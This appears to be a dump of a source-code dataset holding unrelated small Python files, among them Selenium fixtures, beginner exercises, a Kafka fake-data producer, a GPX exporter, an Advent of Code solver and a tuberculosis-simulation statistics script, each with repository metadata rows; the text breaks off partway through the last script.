# fp: the first prime at or above ceil(sqrt(z)).
fp = ceil(sqrt(int(z)))
while True:
    if prime(fp):
        break
    fp+=1
# p: the largest prime strictly below fp.
p = fp-1
while True:
    if prime(p):
        break
    p-=1
# r: the smallest prime strictly above fp.
r = fp+1
while True:
    if prime(r):
        break
    r+=1
# The answer is a product of consecutive primes straddling sqrt(z):
# prefer fp*r if it still fits within z, otherwise fall back to p*fp.
if r*fp<=int(z):
    print(fp,r)
    print(fp*r)
else:
    print(p,fp)
    print(p*fp)
# For Solution in C++:
# The actual solution used yarin's sieve to store data which is multiplication of those prime numbers.
# Actually we needed to find first prime number smaller than root of z and then a prime no. just smaller than that
# and a prime number just greater than that. Our answer will lie in only the two possibilities given.
# If those prime numbers are [p,q,r] then our possible answer will be either p*q or q*r, not anything else than this.
# We need to keep this in mind as well that the greatest difference between any two prime numbers is in range of 10^9,
# and so we need to calculate prime check for all the values in between, but in C++ this primality check is much faster
# and it runs in about 7 seconds for all the values.
# Also there's a corner case for numbers less than 15 as, for those the only solution is 2,3 i.e. 6.
| true |
823b542287017c3e1c515df071147272d907fbe4 | Python | 1221mark/UItest | /conftest.py | UTF-8 | 646 | 2.5625 | 3 | [] | no_license | """conftest.py 文件名称是固定的。
统一存放 fixture 的地方。
"""
import pytest
from selenium import webdriver
from selenium.webdriver import ChromeOptions
@pytest.fixture(scope="session",autouse=True)
def get_browser():
    """Session-wide, auto-used fixture: start a maximized Chrome driver with
    a 20-second implicit wait, yield it to the tests, then quit it."""
    options = ChromeOptions()
    # Path to the Chrome binary (hard-coded Windows install location)
    options.binary_location = r"C:\Users\lenovo\AppData\Local\Google\Chrome\Application\chrome.exe"
    driver = webdriver.Chrome(options = options)
    # Maximize the current window
    driver.maximize_window()
    # Implicit wait (seconds) applied to every element lookup
    wait_time = 20
    driver.implicitly_wait(wait_time)
    yield driver
    driver.quit()
| true |
8047fef3648b673605fd955b2e61cdbf059870e2 | Python | kroze05/Tarea_Ejercicios | /ejercicio_3.py | UTF-8 | 749 | 4.5625 | 5 | [] | no_license | # EJERCICIO 3.- Dados dos números, mostrar la suma, resta, división y multiplicación de ambos
# Exercise 3: given two numbers, show their sum, differences, product and quotients.
val_1=float(input("coloca un número\n"))
val_2=float(input("coloca el segudo número\n"))
suma = val_1 + val_2
# Subtraction and division are computed in both orders (not commutative).
resta_1 = val_1 - val_2
resta_2 = val_2 - val_1
multiplicacion = val_1 * val_2
# NOTE(review): a zero input makes one of these divisions raise ZeroDivisionError.
division_1 = val_1 / val_2
division_2 = val_2 / val_1
print (f"la suma de los terminos es: {suma}")
print (f"la resta de el primer termino con el segundo es: {resta_1}")
print (f"la resta de el segundo termino con el primero es: {resta_2}")
print (f"la mnultiplicacion de los terminos es: {multiplicacion}")
print (f"la division de el primer termino con el segundo es: {division_1}")
print (f"la division de el segundo termino con el primero es: {division_2}") | true |
f08189cfef07bafa7d133f384c383132edf596a4 | Python | MY-KHEL/python-projects | /work.py | UTF-8 | 2,527 | 3.546875 | 4 | [] | no_license | customerName = input('Please input your Name: ').capitalize()
print()
#Beginning of the Phone Number Session
customerPhone = str(0)   # seed with an invalid value so the loop runs at least once
# First pass: keep asking until the number is exactly 11 characters long.
while len(customerPhone) != 11 :
    customerPhone = str(input('Please input your Phone Number: '))
    if len(customerPhone) != 11 :
        print('Number must be 11 digits')
# Second pass: enforce the leading '0'.
# NOTE(review): a number re-entered in this inner loop only gets a length
# WARNING, not re-enforcement -- a wrong-length number can slip through here.
if customerPhone[0]!= '0':
    print('Number must start from 0')
    while customerPhone[0]!= '0':
        customerPhone = str(input('Please input your Phone Number: '))
        if customerPhone[0]!= '0':
            print('Number must start from 0')
        if len(customerPhone) != 11 :
            print('Number must be 11 digits')
print()
print('Lets move on')
print()
#End of the validation of the Phone number
#Starting with the Email aspects:
customerEmail = input('Enter your email: ')
# Bug fix: the original tested ('@gmail.com' or '@hotmail.com' or '@yahoo.com'),
# which evaluates to just '@gmail.com', so the other two domains were never
# accepted.  Each allowed domain must be checked individually.
while not any(domain in customerEmail for domain in ('@gmail.com', '@hotmail.com', '@yahoo.com')):
    customerEmail = input('Your email address must have @gmail.com or @hotmail.com or @yahoo.com \n')
print('_'*40)
print()
# Catalogue: item name -> unit price.
item = {'rice':240,'beans':120,'egg':50,'biscuit':10,'beef':400,'drink':100}
print('Welcome to Mykhel Stores')
print()
print('This is what we have in store and their prices. Choose your order from the items below')
print(item)
n = int(input('\n How many Goods are you buying: '))
purchase = {}   # item name -> quantity bought
for i in range(n):
    itemName = input('Enter your Order \n').lower()
    while itemName not in item:
        itemName = input('We dont have that in store, check the Store for items we have \n').lower()
    print()
    itemQuantity = int(input('How many of this product are you buying: '))
    itemPrice = item[itemName]
    totalPrice = str(itemPrice*itemQuantity)
    print('Price for one : ',itemPrice)
    print('Price for ',itemQuantity,': ',totalPrice)
    purchase[itemName]=itemQuantity
    # (the original also did `i += 1`, a no-op since range() drives the loop)
totalValue = {}   # item name -> line total for the invoice
print()
print('_'*100)
print()
print('Get your Invoice')
print()
print('Name: ',customerName)
print()
print('Phone Number: ',customerPhone)
print()
print('Email: ',customerEmail)
print()
print('Keep shopping at Mykhel Stores')
print('_'*40)
print('Item',' '*9,'Qty',' '*7, 'Total')
print()
for key, value in purchase.items():
    print(key, '-' * 10, value, '-' * 10, value * item.get(key))
    totalValue[key] = value * item.get(key)
    print(' ' * 40)
# Bug fix: the original summed `total_value`, a name that was never defined
# (the dict is called `totalValue`), so the script crashed with a NameError
# right before printing the grand total.
print('Total', '-' * 22, sum(totalValue.values()))
print('\n Thank you for Shopping with us!')
560c52f1f7a2e564b42907223ec85092f4055106 | Python | lsjroberts/tcp | /game/scene/hacking.py | UTF-8 | 835 | 2.65625 | 3 | [] | no_license | # ------- Hacking Scene -------
# Where shit gets hacked yo.
# -----------------------------
# -------- Imports --------
import config
from app.world import Scene, SceneLayer
from app.popup import Popup
from game.code import Parser, Compiler, Executer
# ----------- Hacking Scene -----------
# 01110101011
class HackingScene( Scene ):
    """Scene for the hacking mini-game: stacks the room's wall/floor, desk
    and chair image layers at their configured sprite depths."""
    def __init__( self ):
        Scene.__init__( self )
        # Background: the room itself, at the far sprite depth.
        self.addLayer( SceneLayer(
            "hacking/wall-floor.jpg",
            config.spriteLayers['sceneFar']
        ) )
        # Desk: offset by one from the far depth.
        self.addLayer( SceneLayer(
            'hacking/desk.jpg',
            config.spriteLayers['sceneFar'] - 1
        ) )
        # Chair: at the near sprite depth.
        self.addLayer( SceneLayer(
            'hacking/chair.jpg',
            config.spriteLayers['sceneNear']
        ) )
class CodePopup( Popup ):
    def execute( self ):
        """Run the popup's code through the parse -> compile -> execute chain.

        NOTE(review): `result` is neither returned nor stored, so Executer is
        presumably run for its side effects -- confirm against game.code.
        """
        parsed = Parser( self.code )
        compiled = Compiler( parsed )
        result = Executer( compiled )
e339c4d3fe798de19d15c15ecd679fb4853a19ee | Python | twosilly/SVGReader | /__init__.py | UTF-8 | 1,166 | 2.65625 | 3 | [] | no_license | # Copyright (c) 2017 Ultimaker B.V.
# This example is released under the terms of the AGPLv3 or higher.
from . import SVGReader
## Define additional metadata for the plugin.
#
# A file-reader plugin must declare extra metadata such as the file types
# it is able to read.  Some plugin kinds need other metadata (for instance
# the file types they can read or the name of the tool they define); a
# plain "extension" plugin has no additional metadata.
def getMetaData():
    return {
        "mesh_reader": [ # a reader may handle several file types, hence a list
            {
                "extension": "svg",
                "description": "svg file type"
            }
        ]
    }
## Let Uranium know that this plugin exists.
#
# Called at application start-up to discover which plugins exist and of
# which type.  Must return a dictionary mapping plugin-type strings
# ("mesh_reader" in this case) to objects that inherit from PluginObject.
#
# \param app The application the plugin needs to register with.
def register(app):
    return {"mesh_reader": SVGReader.SVGFileReader()}
| true |
5fa5c8a88589d0374070784dd9ed0759bb91e9e7 | Python | hendersontrent/theft | /inst/python/kats_calculator.py | UTF-8 | 885 | 2.9375 | 3 | [
"MIT"
] | permissive | #---------------------------------------
# This script sets out to define a call
# to {Kats} to calculate all available
# features on a given input time series
#---------------------------------------
#---------------------------------------
# Author: Trent Henderson, 24 June 2021
#---------------------------------------
def kats_calculator(timepoints, values):
    """Compute every time-series feature offered by Kats' TsFeatures.

    Args:
        timepoints: sequence of date-like values (parseable by pandas.to_datetime)
        values: sequence of observations aligned with `timepoints`

    Returns:
        Whatever TsFeatures().transform() produces (a feature mapping).
    """
    # Imports are local so R (via reticulate) only pays for them when called.
    import pandas as pd
    from kats.consts import TimeSeriesData
    from kats.tsfeatures.tsfeatures import TsFeatures
    # Transform data to correct object
    data = pd.DataFrame({'time':timepoints, 'value':values})
    data['time'] = pd.to_datetime(data['time'])
    data['time'] = [x.date() for x in data.time]  # truncate timestamps to dates
    data = TimeSeriesData(data)
    # Instantiate TsFeatures
    model = TsFeatures()
    # Run calculations
    extracted_features = model.transform(data)
    return extracted_features
| true |
59e216af8e0b3643fe120efc588d1daff23e87b1 | Python | rpfk/python-kafka-producer | /Factory/Factory.py | UTF-8 | 2,541 | 2.828125 | 3 | [] | no_license | import importlib
import threading
import time
from numpy.random import choice
from faker import Faker
from bisect import bisect
class Factory(threading.Thread):
    """Daemon thread that fabricates fake 'products' and ships them via a
    producer's .send(topic, key=..., value=...) API (a Kafka producer, per
    the repo name).

    Behaviour is driven entirely by the `assignment` dict: which product
    classes to build ('products' / 'product_weights'), how often
    ('production_rate', keyed by elapsed seconds), and where to publish
    ('topic_mapping' / 'topics').
    """
    daemon = True
    def __init__(self, assignment, producer, *args, **kwargs):
        super(Factory, self).__init__(*args, **kwargs)
        self.assignment = assignment
        self.producer = producer
        self.faker = Faker()
        self.products = self.create_products(assignment)
        # Breakpoints (seconds since start) at which the rate/topic schedules change.
        self.production_rate = [int(s) for s in assignment['production_rate'].keys()]
        self.topic_mapping = [int(s) for s in assignment['topic_mapping'].keys()]
    @staticmethod
    def get_product(module_name, class_name):
        # load the module, will raise ImportError if module cannot be loaded
        m = importlib.import_module(module_name)
        # get the class, will raise AttributeError if class cannot be found
        c = getattr(m, class_name)
        return c
    def create_products(self, assignment):
        # Resolve every configured product name to its class in Factory.Product.
        products = []
        for product in assignment['products']:
            products.append(self.get_product('Factory.Product', product))
        return products
    def run(self):
        start = time.time()
        while True:
            run_time = time.time() - start
            # get the production rate as defined in the factory assignment
            rate = self.assignment['production_rate'][str(self.production_rate[bisect(self.production_rate, run_time) - 1])]
            # get the send mapping as defined in the factory assignment
            topics = self.assignment['topic_mapping'][str(self.topic_mapping[bisect(self.topic_mapping, run_time) - 1])]
            # get the product to deliver (weighted random pick)
            product = choice(self.products, 1, p=self.assignment['product_weights'])[0]
            # deliver the product
            self.deliver(product(self.faker), topics)
            # for debugging
            print time.time()
            # determine the time to next delivery based on the production rate defined in the factory assignment
            time.sleep(1 / float(rate) - (run_time % (1 / float(rate))))
    def deliver(self, product, topic_mapping):
        # topic_mapping parallels assignment['topics']: send to topics[i]
        # whenever topic_mapping[i] is truthy.
        for index, map_topic in enumerate(topic_mapping):
            if map_topic:
                # for debugging
                print self.assignment['topics'][index], product.key, product.value
                # send the product as message over Kafka
                self.producer.send(self.assignment['topics'][index], key=product.key, value=product.value)
| true |
723f08ac7423d461d8daeb9e6304a2fe06124db1 | Python | mukoedo1993/Python_related | /python_official_tutorial/chap5_2/del_statement.py | UTF-8 | 286 | 3 | 3 | [] | no_license | import copy
# Demonstrates the `del` statement on deep copies of the same list.
a = [-1, 1, 66.25, 333, 333, 1234.5];a1=copy.deepcopy(a);a2=copy.deepcopy(a);a3=copy.deepcopy(a)
del a[0];print(a)    # remove one element by index
del a1[2:4];print(a1)    # remove a slice
del a2[:];print(a2)    # clear the whole list
del a3#; print(a3)    # unbind the NAME itself
"""
Reference to a3 hereafter is an error(at least until other value is assigned to it.)
"""
20da47f027a46fc2728533c385baaeca906750cd | Python | aziaziazi/Udacity-ITPN | /Stage4/4.6.2_Vérification/verification/main.py | UTF-8 | 1,720 | 3.46875 | 3 | [] | no_license | # Lession 4.6: Responding Based on Verification
# This session will show us how we can put in custom responses in our server in order to respond
# to a user whether the birthday entered is valid or not
# https://www.udacity.com/course/viewer#!/c-nd000/l-4175328805/m-48714318
import webapp2
import valid_date
form = """
<form method="post">
What is your birthday?
<br>
<label> Month
<input type="text" name="month" value="%(month)s">
</label>
<label> Day
<input type="text" name="day" value="%(day)s">
</label>
<label> Year
<input type="text" name="year" value="%(year)s">
</label>
<div style="color:red">%(error)s</div>
<br>
<br>
<input type="submit">
</form>
"""
class MainPage(webapp2.RequestHandler):
    """Birthday form handler: GET renders the form, POST validates it using
    the companion valid_date module."""
    def write_form(self, error="", month="", day="", year=""):
        # Re-render the form template, echoing back the prior input and any
        # error text.
        self.response.out.write(form % {"error" : error,
                                        "month" : month,
                                        "day" : day,
                                        "year" : year})
    def get(self):
        self.write_form()
    def post(self):
        user_month = self.request.get("month")
        user_day = self.request.get("day")
        user_year = self.request.get("year")
        # valid_* presumably return a truthy value only for valid input --
        # confirm against valid_date.py.
        month = valid_date.valid_month(user_month)
        day = valid_date.valid_day(user_day)
        year = valid_date.valid_year(user_year)
        if (month and day and year):
            self.response.out.write("Thanks beeing so good at selecting dates!")
        else:
            self.write_form("That's not valid to me, my friend", user_month, user_day, user_year)
app = webapp2.WSGIApplication([("/", MainPage)], debug = True)
| true |
c52bad5616976be852becacb31d6a29fe3812811 | Python | JWCook/pyinaturalist | /examples/observations_to_gpx.py | UTF-8 | 3,451 | 3.015625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
"""
An example of converting observation locations + metadata into GPX format.
Extra dependencies:
``pip install gpxpy``
"""
from logging import getLogger
from gpxpy.gpx import GPX, GPXTrack, GPXTrackPoint, GPXTrackSegment, GPXWaypoint
from pyinaturalist import Observation, get_observations
from pyinaturalist.constants import JsonResponse, List
from pyinaturalist.response_format import convert_observation_timestamps
logger = getLogger(__name__)
def observations_to_gpx(
    observations: List[JsonResponse], output_file: str = "observations.gpx", track: bool = True
):
    """Convert a list of observations to a set of GPX waypoints or a GPX track

    Args:
        observations: JSON observations
        output_file: File path to write to
        track: Create an ordered GPX track; otherwise, create unordered GPX waypoints
    """
    gpx = GPX()
    logger.info(f"Converting {len(observations)} to GPX points")
    points = [observation_to_gpx_point(obs, track=track) for obs in observations]
    if track:
        # A track requires the GPX -> track -> segment -> points hierarchy.
        gpx_track = GPXTrack()
        gpx.tracks.append(gpx_track)
        gpx_segment = GPXTrackSegment()
        gpx_track.segments.append(gpx_segment)
        gpx_segment.points = points
    else:
        gpx.waypoints = points
    # Save to file
    logger.info(f"Writing GPX data to {output_file}")
    with open(output_file, "w") as f:
        f.write(gpx.to_xml())
def observation_to_gpx_point(observation: JsonResponse, track: bool = True):
    """Convert a single observation to a GPX point

    Args:
        observation: JSON observation
        track: Indicates that this point is part of an ordered GPX track;
            otherwise, assume it is an unordered waypoint
    """
    logger.debug(f'Processing observation {observation["id"]}')
    # GeoJSON coordinates are ordered as `longitude, latitude`
    long, lat = observation["geojson"]["coordinates"]
    # Get medium-sized photo URL, if available; otherwise just use observation URL
    if observation["photos"]:
        link = observation["photos"][0]["url"].replace("square", "medium")
    else:
        link = observation["uri"]
    # Track points and waypoints are constructed with the same keyword args.
    point_cls = GPXTrackPoint if track else GPXWaypoint
    point = point_cls(
        latitude=lat,
        longitude=long,
        time=convert_observation_timestamps(observation),
        comment=str(Observation.from_json(observation)),
    )
    point.description = observation["description"]
    point.link = link
    point.link_text = f'Observation {observation["id"]}'
    return point
if __name__ == "__main__":
    # Get first page of search results (for testing)
    search_params = {
        "project_id": 36883,  # ID of the 'Sugarloaf Ridge State Park' project
        "created_d1": "2020-01-01",  # Get observations from January 2020...
        "created_d2": "2020-09-30",  # ...through September 2020 (adjust these dates as needed)
        "geo": True,  # Only get observations with geospatial coordinates
        "geoprivacy": "open",  # Only get observations with public coordinates (not obscured/private)
        "page": "all",  # Paginate through all response pages
    }
    # NOTE(review): indexing ["results"] assumes a dict-shaped response --
    # confirm against the installed pyinaturalist version.
    results = get_observations(**search_params)["results"]
    # Paginate through all search results (may take a long time for a large query)
    # results = get_observations(**search_params)
    # Convert and write to GPX file
    observations_to_gpx(results)
    # observations_to_tsp(results)
| true |
7e4d1ca914a02e3255b059cd728e1277dfb48c1b | Python | sigudd/Session2 | /Session2_Assignment2.py | UTF-8 | 2,300 | 4.40625 | 4 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
# In[1]:
# The myReduceSum function works like reduce function for finding sum of all given values
import sys
sys.setrecursionlimit(100)
#this myReduce function finds the sum of all the numbers upto the given number. eg Number:3 gives 1+2+3=6 as result
def myReduceSum(n):
    """Recursively compute 1 + 2 + ... + n (a reduce-with-addition clone)."""
    # Base case n == 1; otherwise peel off n and recurse on the remainder.
    return 1 if n == 1 else n + myReduceSum(n - 1)
sumRange = 7
print(myReduceSum(sumRange-1))  # 1+2+...+6 == 21
# In[2]:
# The same cumulative sum, this time computed with functools.reduce over range(7)
from functools import reduce
lst =range(7)
reduce(lambda x,y: x+y,lst)
# In[18]:
# The myfilterList function works like filter function for given list of values, which returns all even values
def myFilterEvenList(rangeLimit):
    """Return the even numbers in range(rangeLimit), mimicking filter()."""
    return [num for num in range(rangeLimit) if num % 2 == 0]
rangeLimit = 20
print(myFilterEvenList(rangeLimit))
# In[4]:
#2.Implement List comprehensions to produce the following lists. Write List comprehensions to produce the following Lists ['A', 'C', 'A', 'D', 'G', 'I', ’L’, ‘ D’] ['x', 'xx', 'xxx', 'xxxx', 'y', 'yy', 'yyy', 'yyyy', 'z', 'zz', 'zzz', 'zzzz'] ['x', 'y', 'z', 'xx', 'yy', 'zz', 'xxx', 'yyy', 'zzz', 'xxxx', 'yyyy', 'zzzz'] [[2], [3], [4], [3], [4], [5], [4], [5], [6]] [[2, 3, 4, 5], [3, 4, 5, 6], [4, 5, 6, 7], [5, 6, 7, 8]] [(1, 1), (2, 1), (3, 1), (1, 2), (2, 2), (3, 2), (1, 3), (2, 3), (3, 3)]
myLst = [letter for letter in 'ACADGILD']   # one list entry per character
print(myLst)
# In[5]:
myLst = [letter*i for letter in 'xyz' for i in list(range(1,5))]   # grouped by letter
print(myLst)
# In[6]:
myLst = [letter*i for i in list(range(1,5)) for letter in 'xyz']   # grouped by repeat count
print(myLst)
# In[7]:
myLst = [ list(range(x,x+y)) for x in range(2,6) for y in range(4,5) ]   # 4-long runs starting at 2..5
print(myLst)
# In[8]:
myLst = [ (x,y) for x in range(1,4) for y in range(1,4) ]   # all (x, y) pairs, x varying slowest
print(myLst)
# In[9]:
#Implement a function longestWord() that takes a list of words and returns the longest one
def longestWord(lstOfWords):
    """Return the longest word in the list (first one on ties, '' if empty).

    Bug fix: the original tracked the longest word in ``maxWord`` but then
    returned ``word`` -- the loop variable, i.e. whatever element happened
    to come LAST -- so it only worked when the longest word was also the
    final element (and raised NameError for an empty list).
    """
    maxWord = ''
    for word in lstOfWords:
        if len(word) > len(maxWord):  # strict > keeps the first of equals
            maxWord = word
    return maxWord
words = ['Hi','Hello','how','are','acadgild']
print('the longest word is: ', longestWord(words))
# In[ ]:
| true |
641150a73d7fdb269fefa617b1badf1d81715e03 | Python | tituvely/django_lectures | /django_lectures/tuples.py | UTF-8 | 292 | 4.09375 | 4 | [] | no_license | # Booleans
True    # bare literals: evaluated and discarded (no visible effect)
False
# Tuples -> immutable
t = (1,2,3)
print(t[0])   # tuples index like lists
t = ('a', True, 123)   # heterogeneous contents are fine
print(t)
# t[0] = 'New'  <- would raise TypeError: tuples do not support item assignment
# Sets
x = set()
x.add(1)
x.add(2)
print(x)
x.add(0.4)
print(x)
x.add(1)   # re-adding existing members changes nothing: set members are unique
x.add(2)
print(x)
converted = set([1,1,1,1,1,2,3,3,4,2,23])   # duplicates collapse on conversion
print(converted)
ce26061dfcc6fef1c6683021672f24a0548d1fa1 | Python | ayberkydn/haxRL | /pyrl/HorizontalBorder.py | UTF-8 | 653 | 3.328125 | 3 | [] | no_license | from Border import Border
import pygame
class HorizontalBorder(Border):
    """A horizontal border segment of the given length, centred on
    (center_x, center_y)."""
    def __init__(self, center_x, center_y, length, restitution, visible = True, ghost = False):
        super().__init__(center_x, center_y, restitution, visible, ghost)
        self.length = length
    def draw(self):
        # Draw a 3px-wide line spanning from the left end to the right end.
        # self.center / self.color / self.scene are assumed to be set up by
        # Border -- confirm against Border's definition.
        if self.visible:
            start_x = self.center.x - self.length / 2
            start_y = self.center.y
            end_x = self.center.x + self.length / 2
            end_y = start_y
            pygame.draw.lines(self.scene.screen, self.color, False, [(start_x, start_y), (end_x, end_y)], 3)
| true |
d8885fe2dee9c90dcf506e173ae8a3238239cb90 | Python | mexiscool/Advent-of-Code-2020 | /day 7 (55min)/solver2.py | UTF-8 | 503 | 2.796875 | 3 | [] | no_license | a = open('input.txt', 'r').readlines()
rules = {}
# Build rules: outer bag colour -> {inner bag colour: count}, from lines like
# "light red bags contain 1 bright white bag, 2 muted yellow bags."
for i in a:
    rule = {}
    j = i.split('.\n')[0].split(' bags contain')
    #if j[0] == 'shiny gold':
    #    continue
    k = (j[1]).split(',')
    for m in k:
        n = m.split(' bag')[0]
        # n looks like " 3 muted yellow": n[1] is the (single-digit) count,
        # n[3:] the colour.  " no other" gives n[3:] == ' other' and is skipped.
        if n[3:] != ' other':
            rule[n[3:]] = int(n[1])
    rules[j[0]] = rule
def deepsearch(key):
    """Return 1 (the bag itself) plus the total number of bags nested inside
    `key`, according to the global `rules` mapping."""
    print('key: '+str(key))  # debug trace
    sum = 1  # NOTE: shadows the builtin sum()
    for value in rules[key]:
        print(value)  # debug trace
        sum += deepsearch(value)*rules[key][value]
    return sum
# Subtract 1 so the shiny gold bag itself is not counted in the answer.
print(deepsearch('shiny gold') - 1)
44bf262887c514ab4c9ae447e6f131d7315bd518 | Python | zhangfang615/Tuberculosis | /simulation/TB_statistics.py | UTF-8 | 14,084 | 2.515625 | 3 | [
"Apache-2.0"
] | permissive | from __future__ import division
__author__ = 'Fang'
__date__= '2016.9.16'
__email__= 'fza34@sfu.ca'
__function__ = 'Tuberculosis simulation statistics'
import os
import random
import ast
import pandas
class patient:
    """State of one simulated TB patient, reconstructed from the event log."""

    def __init__(self):  # was `_init_`: Python never calls that, so instances started empty
        self.removal = False             # removed from the population?
        self.resistant = False           # currently drug-resistant?
        self.eventlist = []              # raw event strings, oldest first
        self.mutation = {}               # position -> 2-char "ref+alt" nucleotide pair
        self.resistant_mutation = set()  # positions of resistance-conferring mutations
def load_positions(position_path):
    """Read SNP position ids (one per line, stripped) from `position_path`.

    Reading stops at the first blank line, matching the original readline
    loop.  Uses open() + with instead of the Python-2-only file() builtin,
    so the handle is closed even on error.
    """
    position_list = []
    with open(position_path) as position_file:
        for line in position_file:
            position = line.strip()
            if not position:
                break  # original loop terminated at the first blank line
            position_list.append(position)
    return position_list
def load_resistant_SNPs(resi_path, SNP_positions, TB_sequence):
    """Load resistance-conferring SNPs from a VCF-like file.

    For every line starting with "Mycobacterium" (tab-separated; column 1 is
    the position id, column 4 the alternate base) the entry
    {index of position in SNP_positions: "REF ALT"} is recorded; multiple
    SNPs at one position are comma-joined.  Reading stops at the first blank
    line, matching the original readline loop.  Uses open() + with instead
    of the Python-2-only file() builtin.
    """
    resistant_SNPs = {}
    with open(resi_path) as resitant_SNPs_file:
        for raw_line in resitant_SNPs_file:
            line = raw_line.strip()
            if not line:
                break  # original loop terminated at the first blank line
            if line.startswith("Mycobacterium"):
                fields = line.split("\t")
                position = int(SNP_positions.index(fields[1]))
                mutation = TB_sequence[position] + " " + fields[4].upper()
                if position in resistant_SNPs:
                    resistant_SNPs[position] = resistant_SNPs[position] + "," + mutation
                else:
                    resistant_SNPs[position] = mutation
    return resistant_SNPs
def eventlist_str2list(eventlist_string):
    """Split a tab-separated event string into a list of event strings."""
    return list(eventlist_string.split("\t"))
def mutation_str2dic(mutation_string):
    """Strip the 11-character "mutation : " prefix and literal-eval the dict."""
    payload = mutation_string[11:]
    return ast.literal_eval(payload)
def resistant_mutation_str2set(resistant_mutation_string):
    """Parse 'resistant_mutation : set([...])' into a set of int positions.

    Replaces eval() with ast.literal_eval on the inner list literal, so
    arbitrary code embedded in the (file-sourced) string can no longer
    execute.  Handles both "set([...])" and "set()" forms.
    """
    import ast
    body = resistant_mutation_string[20:].strip()
    if body.startswith("set(") and body.endswith(")"):
        inner = body[4:-1]
        if not inner:
            return set()  # "set()" -> empty set
        return set(ast.literal_eval(inner))
    # fall back for a bare literal such as "{1, 2}"
    return set(ast.literal_eval(body))
def resistant_str2bool(resistant_string):
    """Parse the second space-separated token: "True" -> True, else False."""
    return resistant_string.split(' ')[1] == "True"
def removal_str2bool(removal_string):
    """Parse the second space-separated token: "True" -> True, else False."""
    return removal_string.split(' ')[1] == "True"
def reconstruct_patients_list(patients, simulation_file, num_patients=1024):
    """Parse a simulation output file into `patients` (a list of `patient`).

    The file layout is fixed: 7 header lines, then one 7-line record per
    patient.  `num_patients` generalizes the previously hard-coded 1024
    (default preserved for existing callers).  Returns the mutated list.
    """
    text = simulation_file.readlines()
    for i in range(num_patients):
        pat = patient()
        # record i occupies file lines 7+7*i .. 13+7*i
        patient_text = text[7 + 7 * i:14 + 7 * i]
        pat.eventlist = eventlist_str2list(patient_text[1].strip())
        pat.mutation = mutation_str2dic(patient_text[2].strip())
        pat.resistant_mutation = resistant_mutation_str2set(patient_text[3].strip())
        pat.resistant = resistant_str2bool(patient_text[4].strip())
        pat.removal = removal_str2bool(patient_text[5].strip())
        patients.append(pat)
    return patients
def patients_sampling(unremoved, kappa):
    """Return a random sample of int(kappa * len(unremoved)) patient indices.

    The caller passes a set; it is converted to a list first because
    random.sample() on a set was deprecated in Python 3.9 and removed in
    Python 3.11.
    """
    sample_number = int(kappa * len(unremoved))
    return random.sample(list(unremoved), sample_number)
def if_SNP_resistant(mutate_position, TB_sequence, nucleotide_muatated, resistant_SNPs):
    """True when (reference base -> mutated base) at this position matches a
    known resistance-conferring SNP listed in `resistant_SNPs`."""
    ref_base = TB_sequence[mutate_position]
    candidates = resistant_SNPs[mutate_position].split(",")
    return any(
        pair.split(" ") == [ref_base, nucleotide_muatated]
        for pair in candidates
    )
def if_mutate_resistant(mutate_position, TB_sequence, nucleotide_muatated, resistant_SNPs):
    """True when the position is a known resistance locus AND the specific
    base change is one of its resistance-conferring SNPs."""
    return (mutate_position in resistant_SNPs
            and if_SNP_resistant(mutate_position, TB_sequence, nucleotide_muatated, resistant_SNPs))
def get_resistant_eventlist(patients,n, resistant_SNPs):
    """Replay patient n's event log backwards, undoing each event, and
    collect the events that changed resistance status.

    Event codes (first token of each event string): '4' = removal,
    '2' = (re)infection/transmission, '1' = new point mutation, anything
    else = change of an existing mutation.  Returns markers: '2' when
    undoing a transmission drops resistance (resistance was transmitted),
    '3' for each undone resistance mutation.

    NOTE(review): reads the module-level global TB_sequence rather than a
    parameter -- the caller must have loaded it first.  Destructively
    mutates the patient object.  Python 2 syntax (print statements,
    `except Exception, e`) is preserved byte-for-byte.
    """
    resistant_eventlist = []
    patient = patients[n]
    while patient.eventlist:
        event = patient.eventlist[-1].split(" ")
        if event[0] == '4':
            # undo a removal event
            patient.removal = False
            patient.eventlist.pop()
        elif event[0] == '2':
            if event[1] == str(n):
                patient.eventlist.pop()
            else:
                # undo a transmission: restore the mutation set carried at infection time
                patient.mutation.clear()
                mutations = event[3].split(";")
                mutations = mutations[0:len(mutations) - 1]
                for mutation in mutations:
                    fields = mutation.split(":")
                    patient.mutation[int(fields[0])] = fields[1]
                patient.resistant_mutation.clear()
                res = patient.resistant # record resistant
                patient.resistant = False
                # recompute resistance from the restored mutation set
                for mutate_position in patient.mutation.keys():
                    nucleotide_muatated = list(patient.mutation[mutate_position])[1]
                    if if_mutate_resistant(mutate_position, TB_sequence, nucleotide_muatated, resistant_SNPs):
                        patient.resistant_mutation.add(mutate_position)
                        patient.resistant = True
                if res == True and patient.resistant ==False:
                    # resistance disappeared when the transmission was undone -> it was transmitted
                    resistant_eventlist.append('2')
                patient.eventlist.pop()
        elif event[0] == '1':
            # undo a new point mutation (event: position, ref, alt)
            SNP = list(patient.mutation[int(event[1])])
            if event[2] == SNP[0] and event[3] == SNP[1]:
                patient.mutation.pop(int(event[1]))
                patient.eventlist.pop()
            else:
                print "Bug!"
                break
        else:
            # undo a change to an existing mutation at event[1]
            SNP = list(patient.mutation[int(event[1])])
            if event[3] == SNP[1]:
                if event[2] == SNP[0]:
                    patient.mutation.pop(int(event[1]))
                else:
                    SNP[1] = event[2]
                    patient.mutation[int(event[1])] = "".join(SNP)
                try:
                    patient.resistant_mutation.remove(int(event[1]))
                except Exception, e:
                    # print patient.eventlist[-1]
                    # print event[1]+event[2]+event[3]
                    print Exception, ":", e
                    # print if_mutate_resistant(int(event[1]), TB_sequence, event[3], resistant_SNPs)
                    # print resistant_SNPs[int(event[1])]
                resistant_eventlist.append('3')
                if not patient.resistant_mutation:
                    patient.resistant = False
                patient.eventlist.pop()
            else:
                print "Bug!"
                break
    if patient.mutation or patient.removal or patient.resistant:
        # NOTE(review): this bare string is a no-op -- presumably a print was intended
        " failed traced back!"
    return resistant_eventlist
if __name__ == '__main__':
    # Parameter sweep over (t, beta, P_resi, gama); for each simulation file,
    # sample 10% of unremoved patients 20 times and write summary statistics.
    # Python 2 script: uses the file() builtin and print statements elsewhere.
    statistic_output = file("E:/PYTHON_PROJECTS/TB_simulation/statistics_new", 'w')
    t_list = [10, 20, 30, 40, 50] # time span 10, 15, 20, 25, 30, 35, 40, 45, 50
    beta_list = [0.02, 0.025, 0.03, 0.035, 0.04] # contact/reinfection rate 0.001,0.01,0.05,0.1,0.15,0.2,0.25,0.3,0.35,0.4
